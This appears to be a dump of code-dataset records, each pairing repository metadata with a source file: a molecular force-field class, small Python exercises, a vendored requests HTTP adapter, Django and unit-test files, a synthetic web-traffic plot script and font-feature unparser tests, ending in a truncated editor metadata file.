] | permissive | ctk3b/InterMol | d1e8a53efedcd180ba6e3d5cf80788defae478fb | 5224b0a01e6db02ecb9dc1e6996a6df5e9bf630d | refs/heads/master | 2020-04-04T20:47:41.012740 | 2017-03-12T20:51:01 | 2017-03-12T20:51:01 | 40,187,082 | 0 | 0 | null | 2015-08-04T13:42:12 | 2015-08-04T13:42:11 | null | UTF-8 | Python | false | false | 1,302 | py | import simtk.unit as units
from intermol.decorators import accepts_compatible_units
from intermol.forces.abstract_nonbonded_type import AbstractNonbondedType
class LjSigepsNonbondedType(AbstractNonbondedType):
__slots__ = ['sigma', 'epsilon', 'type']
@accepts_compatible_units(None, None,
sigma=units.nanometers,
epsilon=units.kilojoules_per_mole,
type=None)
def __init__(self, bondingtype1, bondingtype2,
sigma=0.0 * units.nanometers,
epsilon=0.0 * units.kilojoules_per_mole,
type=False):
AbstractNonbondedType.__init__(self, bondingtype1, bondingtype2, type)
self.sigma = sigma
self.epsilon = epsilon
class LjSigepsNonbonded(LjSigepsNonbondedType):
"""
stub documentation
"""
def __init__(self, atom1, atom2, bondingtype1=None, bondingtype2=None,
sigma=0.0 * units.nanometers,
epsilon=0.0 * units.kilojoules_per_mole,
type=False):
self.atom1 = atom1
self.atom2 = atom2
LjSigepsNonbondedType.__init__(self, bondingtype1, bondingtype2,
sigma=sigma,
epsilon=epsilon,
type=type) | [
"christoph.t.klein@me.com"
] | christoph.t.klein@me.com |
8f802d5a06c8affa293d6fc923516647aea1786f | e14372adf86d3c4f9e73c9f7111db3215c696c3d | /1.入门/从入门到实践/5-1.py | d3c8ef6dd09777d806fc8818c2f24fdc77aee7bf | [] | no_license | hewei-bit/PYTHON_learning | 71ddd7560a52575528547187f4fb40f39a3cbbdb | 18de8e5bdca165df5a5a4b5e0887846593656f4e | refs/heads/master | 2022-12-02T13:38:05.907135 | 2020-08-13T04:57:41 | 2020-08-13T04:57:41 | 261,647,401 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 140 | py | age = int(input('请输入年龄:'))
if age < 2:
print('这个人是个婴儿')
elif age <4:
print('这个人正在蹒跚学步')
| [
"1003826976@qq.com"
] | 1003826976@qq.com |
65973df5fe958ef43d875007d011cb487127b30f | d66818f4b951943553826a5f64413e90120e1fae | /hackerearth/Algorithms/Beautiful Strings/solution.py | 33a4185d9020a23110d3f259c0ff305bdb2dd595 | [
"MIT"
] | permissive | HBinhCT/Q-project | 0f80cd15c9945c43e2e17072416ddb6e4745e7fa | 19923cbaa3c83c670527899ece5c3ad31bcebe65 | refs/heads/master | 2023-08-30T08:59:16.006567 | 2023-08-29T15:30:21 | 2023-08-29T15:30:21 | 247,630,603 | 8 | 1 | MIT | 2020-07-22T01:20:23 | 2020-03-16T06:48:02 | Python | UTF-8 | Python | false | false | 875 | py | """
# Sample code to perform I/O:
name = input() # Reading input from STDIN
print('Hi, %s.' % name) # Writing output to STDOUT
# Warning: Printing unwanted or ill-formatted data to output will cause the test cases to fail
"""
# Write your code here
from collections import defaultdict
t = int(input())
for _ in range(t):
l = input().strip()
count_a = count_b = count_c = 0
delta_patterns = defaultdict(int)
delta_patterns[(0, 0)] = 1
for c in l:
if c == 'a':
count_a += 1
elif c == 'b':
count_b += 1
elif c == 'c':
count_c += 1
combine = (count_a - count_b, count_a - count_c)
delta_patterns[combine] += 1
result = 0
for count in delta_patterns.values():
if count > 1:
result += (count - 1) * count // 2
print(result)
| [
"hbinhct@gmail.com"
] | hbinhct@gmail.com |
ea5ae52448c1744bc885cded9dd21cfdfc274cc2 | 6deafbf6257a5c30f084c3678712235c2c31a686 | /Toolz/dirsearch/thirdparty/requests/adapters.py | f911fc5730d74e1c476e85e4ec74ec4b3be6c1e2 | [
"GPL-2.0-only",
"Unlicense"
] | permissive | thezakman/CTF-Heaven | 53fcb4a72afa821ad05d8cc3b309fb388f958163 | 4b52a2178922f1502ab00fa8fc156d35e1dc653f | refs/heads/master | 2023-04-05T18:20:54.680378 | 2023-03-21T13:47:45 | 2023-03-21T13:47:45 | 167,290,879 | 182 | 24 | Unlicense | 2022-11-29T21:41:30 | 2019-01-24T02:44:24 | Python | UTF-8 | Python | false | false | 16,627 | py | # -*- coding: utf-8 -*-
"""
requests.adapters
~~~~~~~~~~~~~~~~~
This module contains the transport adapters that Requests uses to define
and maintain connections.
"""
import socket
from .models import Response
from .packages.urllib3.poolmanager import PoolManager, proxy_from_url
from .packages.urllib3.response import HTTPResponse
from .packages.urllib3.util import Timeout as TimeoutSauce
from .packages.urllib3.util.retry import Retry
from .compat import urlparse, basestring
from .utils import (DEFAULT_CA_BUNDLE_PATH, get_encoding_from_headers,
prepend_scheme_if_needed, get_auth_from_url, urldefragauth,
select_proxy)
from .structures import CaseInsensitiveDict
from .packages.urllib3.exceptions import ConnectTimeoutError
from .packages.urllib3.exceptions import HTTPError as _HTTPError
from .packages.urllib3.exceptions import MaxRetryError
from .packages.urllib3.exceptions import ProxyError as _ProxyError
from .packages.urllib3.exceptions import ProtocolError
from .packages.urllib3.exceptions import ReadTimeoutError
from .packages.urllib3.exceptions import SSLError as _SSLError
from .packages.urllib3.exceptions import ResponseError
from .cookies import extract_cookies_to_jar
from .exceptions import (ConnectionError, ConnectTimeout, ReadTimeout, SSLError,
ProxyError, RetryError)
from .auth import _basic_auth_str
DEFAULT_POOLBLOCK = False
DEFAULT_POOLSIZE = 10
DEFAULT_RETRIES = 0
DEFAULT_POOL_TIMEOUT = None
class BaseAdapter(object):
    """The Base Transport Adapter"""
    def __init__(self):
        super(BaseAdapter, self).__init__()
    def send(self):
        # Abstract hook: concrete adapters (e.g. HTTPAdapter below) implement
        # the actual request dispatch.
        raise NotImplementedError
    def close(self):
        # Abstract hook: concrete adapters release held resources here.
        raise NotImplementedError
class HTTPAdapter(BaseAdapter):
    """The built-in HTTP Adapter for urllib3.
    Provides a general-case interface for Requests sessions to contact HTTP and
    HTTPS urls by implementing the Transport Adapter interface. This class will
    usually be created by the :class:`Session <Session>` class under the
    covers.
    :param pool_connections: The number of urllib3 connection pools to cache.
    :param pool_maxsize: The maximum number of connections to save in the pool.
    :param int max_retries: The maximum number of retries each connection
        should attempt. Note, this applies only to failed DNS lookups, socket
        connections and connection timeouts, never to requests where data has
        made it to the server. By default, Requests does not retry failed
        connections. If you need granular control over the conditions under
        which we retry a request, import urllib3's ``Retry`` class and pass
        that instead.
    :param pool_block: Whether the connection pool should block for connections.
    Usage::
      >>> import requests
      >>> s = requests.Session()
      >>> a = requests.adapters.HTTPAdapter(max_retries=3)
      >>> s.mount('http://', a)
    """
    # State captured by __getstate__ for pickling; the urllib3 pool manager
    # itself is not pickleable and is rebuilt from these in __setstate__.
    __attrs__ = ['max_retries', 'config', '_pool_connections', '_pool_maxsize',
                 '_pool_block']
    def __init__(self, pool_connections=DEFAULT_POOLSIZE,
                 pool_maxsize=DEFAULT_POOLSIZE, max_retries=DEFAULT_RETRIES,
                 pool_block=DEFAULT_POOLBLOCK):
        # With the default, reads are never retried; an explicit int or a
        # urllib3 Retry instance is honored as given.
        if max_retries == DEFAULT_RETRIES:
            self.max_retries = Retry(0, read=False)
        else:
            self.max_retries = Retry.from_int(max_retries)
        self.config = {}
        self.proxy_manager = {}
        super(HTTPAdapter, self).__init__()
        self._pool_connections = pool_connections
        self._pool_maxsize = pool_maxsize
        self._pool_block = pool_block
        self.init_poolmanager(pool_connections, pool_maxsize, block=pool_block)
    def __getstate__(self):
        return dict((attr, getattr(self, attr, None)) for attr in
                    self.__attrs__)
    def __setstate__(self, state):
        # Can't handle by adding 'proxy_manager' to self.__attrs__ because
        # because self.poolmanager uses a lambda function, which isn't pickleable.
        self.proxy_manager = {}
        self.config = {}
        for attr, value in state.items():
            setattr(self, attr, value)
        self.init_poolmanager(self._pool_connections, self._pool_maxsize,
                              block=self._pool_block)
    def init_poolmanager(self, connections, maxsize, block=DEFAULT_POOLBLOCK, **pool_kwargs):
        """Initializes a urllib3 PoolManager.
        This method should not be called from user code, and is only
        exposed for use when subclassing the
        :class:`HTTPAdapter <requests.adapters.HTTPAdapter>`.
        :param connections: The number of urllib3 connection pools to cache.
        :param maxsize: The maximum number of connections to save in the pool.
        :param block: Block when no free connections are available.
        :param pool_kwargs: Extra keyword arguments used to initialize the Pool Manager.
        """
        # save these values for pickling
        self._pool_connections = connections
        self._pool_maxsize = maxsize
        self._pool_block = block
        self.poolmanager = PoolManager(num_pools=connections, maxsize=maxsize,
                                       block=block, strict=True, **pool_kwargs)
    def proxy_manager_for(self, proxy, **proxy_kwargs):
        """Return urllib3 ProxyManager for the given proxy.
        This method should not be called from user code, and is only
        exposed for use when subclassing the
        :class:`HTTPAdapter <requests.adapters.HTTPAdapter>`.
        :param proxy: The proxy to return a urllib3 ProxyManager for.
        :param proxy_kwargs: Extra keyword arguments used to configure the Proxy Manager.
        :returns: ProxyManager
        """
        # Proxy managers are cached per proxy URL and reuse the pool settings
        # of this adapter.
        if not proxy in self.proxy_manager:
            proxy_headers = self.proxy_headers(proxy)
            self.proxy_manager[proxy] = proxy_from_url(
                proxy,
                proxy_headers=proxy_headers,
                num_pools=self._pool_connections,
                maxsize=self._pool_maxsize,
                block=self._pool_block,
                **proxy_kwargs)
        return self.proxy_manager[proxy]
    def cert_verify(self, conn, url, verify, cert):
        """Verify a SSL certificate. This method should not be called from user
        code, and is only exposed for use when subclassing the
        :class:`HTTPAdapter <requests.adapters.HTTPAdapter>`.
        :param conn: The urllib3 connection object associated with the cert.
        :param url: The requested URL.
        :param verify: Whether we should actually verify the certificate.
        :param cert: The SSL certificate to verify.
        """
        if url.lower().startswith('https') and verify:
            cert_loc = None
            # Allow self-specified cert location.
            if verify is not True:
                cert_loc = verify
            if not cert_loc:
                cert_loc = DEFAULT_CA_BUNDLE_PATH
            if not cert_loc:
                raise Exception("Could not find a suitable SSL CA certificate bundle.")
            conn.cert_reqs = 'CERT_REQUIRED'
            conn.ca_certs = cert_loc
        else:
            conn.cert_reqs = 'CERT_NONE'
            conn.ca_certs = None
        if cert:
            # cert may be a (cert_file, key_file) pair or a single bundle path.
            if not isinstance(cert, basestring):
                conn.cert_file = cert[0]
                conn.key_file = cert[1]
            else:
                conn.cert_file = cert
    def build_response(self, req, resp):
        """Builds a :class:`Response <requests.Response>` object from a urllib3
        response. This should not be called from user code, and is only exposed
        for use when subclassing the
        :class:`HTTPAdapter <requests.adapters.HTTPAdapter>`
        :param req: The :class:`PreparedRequest <PreparedRequest>` used to generate the response.
        :param resp: The urllib3 response object.
        """
        response = Response()
        # Fallback to None if there's no status_code, for whatever reason.
        response.status_code = getattr(resp, 'status', None)
        # Make headers case-insensitive.
        response.headers = CaseInsensitiveDict(getattr(resp, 'headers', {}))
        # Set encoding.
        response.encoding = get_encoding_from_headers(response.headers)
        response.raw = resp
        response.reason = response.raw.reason
        if isinstance(req.url, bytes):
            response.url = req.url.decode('utf-8')
        else:
            response.url = req.url
        # Add new cookies from the server.
        extract_cookies_to_jar(response.cookies, req, resp)
        # Give the Response some context.
        response.request = req
        response.connection = self
        return response
    def get_connection(self, url, proxies=None):
        """Returns a urllib3 connection for the given URL. This should not be
        called from user code, and is only exposed for use when subclassing the
        :class:`HTTPAdapter <requests.adapters.HTTPAdapter>`.
        :param url: The URL to connect to.
        :param proxies: (optional) A Requests-style dictionary of proxies used on this request.
        """
        proxy = select_proxy(url, proxies)
        if proxy:
            proxy = prepend_scheme_if_needed(proxy, 'http')
            proxy_manager = self.proxy_manager_for(proxy)
            conn = proxy_manager.connection_from_url(url)
        else:
            # Only scheme should be lower case
            parsed = urlparse(url)
            url = parsed.geturl()
            conn = self.poolmanager.connection_from_url(url)
        return conn
    def close(self):
        """Disposes of any internal state.
        Currently, this just closes the PoolManager, which closes pooled
        connections.
        """
        self.poolmanager.clear()
    def request_url(self, request, proxies):
        """Obtain the url to use when making the final request.
        If the message is being sent through a HTTP proxy, the full URL has to
        be used. Otherwise, we should only use the path portion of the URL.
        This should not be called from user code, and is only exposed for use
        when subclassing the
        :class:`HTTPAdapter <requests.adapters.HTTPAdapter>`.
        :param request: The :class:`PreparedRequest <PreparedRequest>` being sent.
        :param proxies: A dictionary of schemes or schemes and hosts to proxy URLs.
        """
        proxy = select_proxy(request.url, proxies)
        scheme = urlparse(request.url).scheme
        # HTTPS over a proxy uses CONNECT tunneling, so the path URL suffices.
        if proxy and scheme != 'https':
            url = urldefragauth(request.url)
        else:
            url = request.path_url
        return url
    def add_headers(self, request, **kwargs):
        """Add any headers needed by the connection. As of v2.0 this does
        nothing by default, but is left for overriding by users that subclass
        the :class:`HTTPAdapter <requests.adapters.HTTPAdapter>`.
        This should not be called from user code, and is only exposed for use
        when subclassing the
        :class:`HTTPAdapter <requests.adapters.HTTPAdapter>`.
        :param request: The :class:`PreparedRequest <PreparedRequest>` to add headers to.
        :param kwargs: The keyword arguments from the call to send().
        """
        pass
    def proxy_headers(self, proxy):
        """Returns a dictionary of the headers to add to any request sent
        through a proxy. This works with urllib3 magic to ensure that they are
        correctly sent to the proxy, rather than in a tunnelled request if
        CONNECT is being used.
        This should not be called from user code, and is only exposed for use
        when subclassing the
        :class:`HTTPAdapter <requests.adapters.HTTPAdapter>`.
        :param proxies: The url of the proxy being used for this request.
        """
        headers = {}
        username, password = get_auth_from_url(proxy)
        if username and password:
            headers['Proxy-Authorization'] = _basic_auth_str(username,
                                                             password)
        return headers
    def send(self, request, stream=False, timeout=None, verify=True, cert=None, proxies=None):
        """Sends PreparedRequest object. Returns Response object.
        :param request: The :class:`PreparedRequest <PreparedRequest>` being sent.
        :param stream: (optional) Whether to stream the request content.
        :param timeout: (optional) How long to wait for the server to send
            data before giving up, as a float, or a :ref:`(connect timeout,
            read timeout) <timeouts>` tuple.
        :type timeout: float or tuple
        :param verify: (optional) Whether to verify SSL certificates.
        :param cert: (optional) Any user-provided SSL certificate to be trusted.
        :param proxies: (optional) The proxies dictionary to apply to the request.
        """
        conn = self.get_connection(request.url, proxies)
        self.cert_verify(conn, request.url, verify, cert)
        url = self.request_url(request, proxies)
        self.add_headers(request)
        # A body without a precomputed Content-Length is sent with chunked
        # transfer-encoding via the manual low-level path below.
        chunked = not (request.body is None or 'Content-Length' in request.headers)
        if isinstance(timeout, tuple):
            try:
                connect, read = timeout
                timeout = TimeoutSauce(connect=connect, read=read)
            except ValueError as e:
                # this may raise a string formatting error.
                err = ("Invalid timeout {0}. Pass a (connect, read) "
                       "timeout tuple, or a single float to set "
                       "both timeouts to the same value".format(timeout))
                raise ValueError(err)
        else:
            timeout = TimeoutSauce(connect=timeout, read=timeout)
        try:
            if not chunked:
                resp = conn.urlopen(
                    method=request.method,
                    url=url,
                    body=request.body,
                    headers=request.headers,
                    redirect=False,
                    assert_same_host=False,
                    preload_content=False,
                    decode_content=False,
                    retries=self.max_retries,
                    timeout=timeout
                )
            # Send the request.
            else:
                # Chunked path: drive the httplib connection by hand so every
                # body chunk is framed with its hex length per RFC 7230.
                if hasattr(conn, 'proxy_pool'):
                    conn = conn.proxy_pool
                low_conn = conn._get_conn(timeout=DEFAULT_POOL_TIMEOUT)
                try:
                    low_conn.putrequest(request.method,
                                        url,
                                        skip_accept_encoding=True)
                    for header, value in request.headers.items():
                        low_conn.putheader(header, value)
                    low_conn.endheaders()
                    for i in request.body:
                        low_conn.send(hex(len(i))[2:].encode('utf-8'))
                        low_conn.send(b'\r\n')
                        low_conn.send(i)
                        low_conn.send(b'\r\n')
                    low_conn.send(b'0\r\n\r\n')
                    r = low_conn.getresponse()
                    resp = HTTPResponse.from_httplib(
                        r,
                        pool=conn,
                        connection=low_conn,
                        preload_content=False,
                        decode_content=False
                    )
                except:
                    # If we hit any problems here, clean up the connection.
                    # Then, reraise so that we can handle the actual exception.
                    low_conn.close()
                    raise
        except (ProtocolError, socket.error) as err:
            raise ConnectionError(err, request=request)
        except MaxRetryError as e:
            if isinstance(e.reason, ConnectTimeoutError):
                raise ConnectTimeout(e, request=request)
            if isinstance(e.reason, ResponseError):
                raise RetryError(e, request=request)
            raise ConnectionError(e, request=request)
        except _ProxyError as e:
            raise ProxyError(e)
        except (_SSLError, _HTTPError) as e:
            if isinstance(e, _SSLError):
                raise SSLError(e, request=request)
            elif isinstance(e, ReadTimeoutError):
                raise ReadTimeout(e, request=request)
            else:
                raise
        return self.build_response(request, resp)
| [
"thezakman@ctf-br.org"
] | thezakman@ctf-br.org |
1c81f2b5373941ff4b3cacc4269d00c333b9dfab | 09aee268ce72d282f53fe94f42478e2b3b48127d | /PracticemodelformProject/testapp/admin.py | 204fdaf32620f4860c87848b9f5ccbbb2094de3c | [] | no_license | keshava519/Django_Projects | c95d0f8c55d4cc946291be6fb058b7298aefe596 | 99584892b9d9ec6b6395a382c684b4d036d07874 | refs/heads/main | 2023-02-23T03:44:32.110742 | 2021-01-27T15:15:13 | 2021-01-27T15:15:13 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 213 | py | from django.contrib import admin
from testapp.models import Student
# Register your models here.
# Admin configuration for the Student model: show the name and marks columns
# in the changelist view.
class StudentAdmin(admin.ModelAdmin):
    list_display=['name','marks']
admin.site.register(Student,StudentAdmin)
| [
"keshava.cadcam@gmail.com"
] | keshava.cadcam@gmail.com |
53410072ce6d7e6b0748d3be7521fbceb1cb762d | 0bdfefad123a03754713c64582a3986bd26965bd | /tests/test_user.py | 5f947fd39d6c494f18bedaa1ea4c80ede89935a6 | [] | no_license | Kennedy128/pitch-survey | 889d7747139b88df76bfb09d8801d83cf05063b7 | f6c0cb8ab8a57ba4b59b53a8a6092d0c023dc8e5 | refs/heads/master | 2022-05-29T07:46:54.391714 | 2020-05-05T23:05:00 | 2020-05-05T23:05:00 | 260,503,908 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,175 | py | import unittest
from app.models import User
from app import db
class UserModelTest(unittest.TestCase):
    """Unit tests for the User model (persistence and password hashing)."""

    def setUp(self):
        # Fresh, unsaved user instance for every test.
        self.new_user = User(username="kennedy", email="kennedymbithi12@gmail.com",
                             bio="I am incredible", profile_pic_url="image_url",
                             password='kenny', id=1)

    def tearDown(self):
        # Remove any rows a test persisted so tests stay independent.
        User.query.delete()

    def test_save_user(self):
        self.new_user.save_user()
        self.assertTrue(len(User.query.all()) > 0)

    def test_password_setter(self):
        # Setting the password in the constructor stores a hash.
        self.assertTrue(self.new_user.pass_secure is not None)

    def test_no_access_password(self):
        # The plaintext password must not be readable back.
        with self.assertRaises(AttributeError):
            self.new_user.password

    def test_password_verification(self):
        # Bug fix: verify the password the user was actually created with
        # ('kenny'), not an unrelated string.
        self.assertTrue(self.new_user.verify_password('kenny'))

    def test_check_instance_variables(self):
        self.assertEqual(self.new_user.username, 'kennedy')
        self.assertEqual(self.new_user.email, 'kennedymbithi12@gmail.com')
        self.assertEqual(self.new_user.bio, 'I am incredible')
        self.assertEqual(self.new_user.profile_pic_url, 'image_url')
        # Bug fix: reading `.password` raises AttributeError by design (see
        # test_no_access_password), so the old equality assertion could never
        # pass; it has been removed.
"santa@northpole.com"
] | santa@northpole.com |
5bc14ae5ea3af7ab4372e0256775d3e2aac22f15 | 12321723fce2266e1579b4b30c39b9589008e21a | /FileHandling/Datatypes/Demo15.py | a3a50fe007351a893f1cc7c4dadc7ea1113d224c | [] | no_license | narrasubbarao/practise | 77ff99e6934b8c572dbefbd440da174998360326 | 882a451febbee93d0c5dc2d6e54b1bc50ec2bff5 | refs/heads/master | 2020-04-22T14:39:53.242896 | 2019-02-22T07:39:49 | 2019-02-22T07:39:49 | 170,451,372 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 90 | py |
# Tuple lookups: count() tallies occurrences of a value, index() finds the
# position of its first appearance.
t1 = (9, 20, 30, 10, 20, 50, 60, 10)
no, pos = t1.count(10), t1.index(10)
print(no)
print(pos)
"narrasubbarao29@gmail.com"
] | narrasubbarao29@gmail.com |
b5d963da42ff8506f0eeb54936e68ed7926e4e90 | 6923f79f1eaaba0ab28b25337ba6cb56be97d32d | /BuildingMachineLearningSystemsWithPython/ch01/gen_webstats.py | fa133d769a16dc477cbbb22ac4d2ba34f9a13a27 | [] | no_license | burakbayramli/books | 9fe7ba0cabf06e113eb125d62fe16d4946f4a4f0 | 5e9a0e03aa7ddf5e5ddf89943ccc68d94b539e95 | refs/heads/master | 2023-08-17T05:31:08.885134 | 2023-08-14T10:05:37 | 2023-08-14T10:05:37 | 72,460,321 | 223 | 174 | null | 2022-10-24T12:15:06 | 2016-10-31T17:24:00 | Jupyter Notebook | UTF-8 | Python | false | false | 1,289 | py | # This code is supporting material for the book
# Building Machine Learning Systems with Python
# by Willi Richert and Luis Pedro Coelho
# published by PACKT Publishing
#
# It is made available under the MIT License
# This script generates web traffic data for our hypothetical
# web startup "MLASS" in chapter 01
import os
import scipy as sp
from scipy.stats import gamma
import matplotlib.pyplot as plt
from utils import DATA_DIR, CHART_DIR
# Generate one month of synthetic hourly web-traffic data: a weekly sinusoid
# plus gamma-distributed noise plus slow exponential growth.
# NOTE(review): the sp.* calls below use scipy's historical aliases for numpy
# functions (sp.arange, sp.random, sp.savetxt, ...); these are deprecated and
# removed in modern SciPy — migrating to numpy directly should be confirmed
# against the book's reproducibility requirements.
sp.random.seed(3)  # to reproduce the data later on
x = sp.arange(1, 31 * 24)
y = sp.array(200 * (sp.sin(2 * sp.pi * x / (7 * 24))), dtype=int)
# NOTE(review): in-place float += into an int array relies on unsafe casting;
# recent NumPy raises here — verify on the targeted NumPy version.
y += gamma.rvs(15, loc=0, scale=100, size=len(x))
y += 2 * sp.exp(x / 100.0)
# Mask the (rare) negative samples instead of clipping them.
y = sp.ma.array(y, mask=[y < 0])
print(sum(y), sum(y < 0))
plt.scatter(x, y)
plt.title("Web traffic over the last month")
plt.xlabel("Time")
plt.ylabel("Hits/hour")
plt.xticks([w * 7 * 24 for w in [0, 1, 2, 3, 4]], ['week %i' % (w + 1) for w in
           [0, 1, 2, 3, 4]])
plt.autoscale(tight=True)
plt.grid()
plt.savefig(os.path.join(CHART_DIR, "1400_01_01.png"))
# sp.savetxt(os.path.join("..", "web_traffic.tsv"),
# zip(x[~y.mask],y[~y.mask]), delimiter="\t", fmt="%i")
sp.savetxt(os.path.join(
    DATA_DIR, "web_traffic.tsv"), list(zip(x, y)), delimiter="\t", fmt="%s")
"bb@b.om"
] | bb@b.om |
19bc27f2d36f6218270c1f5123559fb259030256 | c924753b19bc892f9b756483f080cd8a69f22dec | /tests/test_unparse_sub.py | 314d51de3b294148efc0fee5782aec2767c3f5e2 | [
"BSD-3-Clause"
] | permissive | mbrukman/fontFeatures | 21a65190aea163174486d026627b7a87a2e3fa20 | 9c33517571d9870e536dea005f7387f52b3fc967 | refs/heads/master | 2023-03-07T02:41:37.527028 | 2021-02-16T22:45:47 | 2021-02-16T22:45:47 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,808 | py | from fontFeatures import Substitution, FontFeatures
from fontTools.ttLib import TTFont
from fontFeatures.ttLib.GSUBUnparser import GSUBUnparser
from fontFeatures.ttLib import unparseLanguageSystems
import pprint
import unittest
class TestUnparse(unittest.TestCase):
    """Unit tests for GSUB lookup unparsing against the Amiri font.

    The font and unparser are class-level fixtures, shared by all tests; the
    lookup indices below refer to positions in Amiri's GSUB lookup list.
    """
    font = TTFont("fonts/Amiri-Regular.ttf")
    lookups = font["GSUB"].table.LookupList.Lookup
    ff = FontFeatures()
    unparser = GSUBUnparser(font["GSUB"], ff, [])
    def test_single(self):
        # GSUB LookupType 1 (single substitution).
        g, _ = self.unparser.unparseLookup(self.lookups[1], 1) # part of locl
        self.assertEqual(g.rules[0].asFea(), "sub period by period.ara;")
        self.assertEqual(g.rules[1].asFea(), "sub guillemotleft by guillemotleft.ara;")
    def test_ligature(self):
        # GSUB LookupType 4 (ligature substitution).
        g, _ = self.unparser.unparseLookup(self.lookups[0], 0) # part of ccmp
        self.assertEqual(g.rules[0].asFea(), "sub uni0627 uni065F by uni0673;")
    def test_multiple(self):
        # GSUB LookupType 2 (one glyph to many).
        g, _ = self.unparser.unparseLookup(self.lookups[10], 10)
        self.assertEqual(g.rules[0].asFea(), "sub uni08B6 by uni0628 smallmeem.above;")
    def test_ignore(self):
        # Chaining context with no substitution becomes an `ignore sub` rule.
        g, _ = self.unparser.unparseLookup(self.lookups[48], 48)
        self.assertEqual(
            g.rules[0].asFea(),
            "ignore sub [uni0622 uni0627 uni0648 uni0671 uni0627.fina uni0671.fina] uni0644.init' uni0644.medi' [uni0647.fina uni06C1.fina];",
        )
    def test_chaining(self):
        # Chained contextual lookups need the full lookup list resolved first.
        self.unparser.unparseLookups()
        g, _ = self.unparser.unparseLookup(
            self.lookups[33], 33
        )  # part of calt in quran.fea
        self.unparser.resolve_routine(g)
        self.assertEqual(
            g.rules[0].asFea(),
            "sub uni0644' lookup SingleSubstitution32 uni0621' lookup SingleSubstitution31 uni0627' lookup SingleSubstitution32;",
        )
"simon@simon-cozens.org"
] | simon@simon-cozens.org |
10c6776be69dea31de3ce3a5be4102f89e22cf73 | f9a2e67dd2f40b37d8ff81bf6cdce47c38d2dee4 | /.c9/metadata/environment/clean_architecture/clean_architecture_resources/fb_post_clean_arch/views/create_comment/tests/test_case_01.py | 1962727c033f485ecf40d3db6f262ace0d0d43ce | [] | no_license | mohan277/backend_repo | 4eae065cf0fffa29866a2b549028cb8df4c97643 | 25dbb4d0f1c174b6da95f4c73737e49db9978429 | refs/heads/master | 2022-11-13T00:08:37.600743 | 2020-07-09T04:36:44 | 2020-07-09T04:36:44 | 278,259,585 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 4,447 | py | {"filter":false,"title":"test_case_01.py","tooltip":"/clean_architecture/clean_architecture_resources/fb_post_clean_arch/views/create_comment/tests/test_case_01.py","undoManager":{"mark":9,"position":9,"stack":[[{"start":{"row":37,"column":0},"end":{"row":37,"column":4},"action":"insert","lines":[" "],"id":2}],[{"start":{"row":37,"column":4},"end":{"row":37,"column":8},"action":"insert","lines":[" "],"id":3}],[{"start":{"row":37,"column":8},"end":{"row":37,"column":9},"action":"insert","lines":["p"],"id":4},{"start":{"row":37,"column":9},"end":{"row":37,"column":10},"action":"insert","lines":["r"]},{"start":{"row":37,"column":10},"end":{"row":37,"column":11},"action":"insert","lines":["i"]},{"start":{"row":37,"column":11},"end":{"row":37,"column":12},"action":"insert","lines":["n"]},{"start":{"row":37,"column":12},"end":{"row":37,"column":13},"action":"insert","lines":["t"]}],[{"start":{"row":37,"column":13},"end":{"row":37,"column":15},"action":"insert","lines":["()"],"id":5}],[{"start":{"row":37,"column":14},"end":{"row":37,"column":15},"action":"insert","lines":["s"],"id":6},{"start":{"row":37,"column":15},"end":{"row":37,"column":16},"action":"insert","lines":["e"]},{"start":{"row":37,"column":16},"end":{"row":37,"column":17},"action":"insert","lines":["l"]},{"start":{"row":37,"column":17},"end":{"row":37,"column":18},"action":"insert","lines":["f"]},{"start":{"row":37,"column":18},"end":{
"row":37,"column":19},"action":"insert","lines":["."]},{"start":{"row":37,"column":19},"end":{"row":37,"column":20},"action":"insert","lines":["f"]},{"start":{"row":37,"column":20},"end":{"row":37,"column":21},"action":"insert","lines":["o"]}],[{"start":{"row":37,"column":21},"end":{"row":37,"column":22},"action":"insert","lines":["o"],"id":7},{"start":{"row":37,"column":22},"end":{"row":37,"column":23},"action":"insert","lines":["u"]},{"start":{"row":37,"column":23},"end":{"row":37,"column":24},"action":"insert","lines":["s"]},{"start":{"row":37,"column":24},"end":{"row":37,"column":25},"action":"insert","lines":["e"]},{"start":{"row":37,"column":25},"end":{"row":37,"column":26},"action":"insert","lines":["r"]}],[{"start":{"row":37,"column":22},"end":{"row":37,"column":23},"action":"insert","lines":["_"],"id":8}],[{"start":{"row":37,"column":28},"end":{"row":38,"column":0},"action":"insert","lines":["",""],"id":9},{"start":{"row":38,"column":0},"end":{"row":38,"column":8},"action":"insert","lines":[" "]}],[{"start":{"row":38,"column":0},"end":{"row":38,"column":8},"action":"remove","lines":[" "],"id":10}],[{"start":{"row":44,"column":8},"end":{"row":44,"column":10},"action":"insert","lines":["# "],"id":11},{"start":{"row":46,"column":8},"end":{"row":46,"column":10},"action":"insert","lines":["# "]},{"start":{"row":48,"column":8},"end":{"row":48,"column":10},"action":"insert","lines":["# "]},{"start":{"row":50,"column":8},"end":{"row":50,"column":10},"action":"insert","lines":["# "]},{"start":{"row":52,"column":8},"end":{"row":52,"column":10},"action":"insert","lines":["# "]},{"start":{"row":53,"column":8},"end":{"row":53,"column":10},"action":"insert","lines":["# "]},{"start":{"row":54,"column":8},"end":{"row":54,"column":10},"action":"insert","lines":["# "]},{"start":{"row":55,"column":8},"end":{"row":55,"column":10},"action":"insert","lines":["# "]},{"start":{"row":57,"column":8},"end":{"row":57,"column":10},"action":"insert","lines":["# 
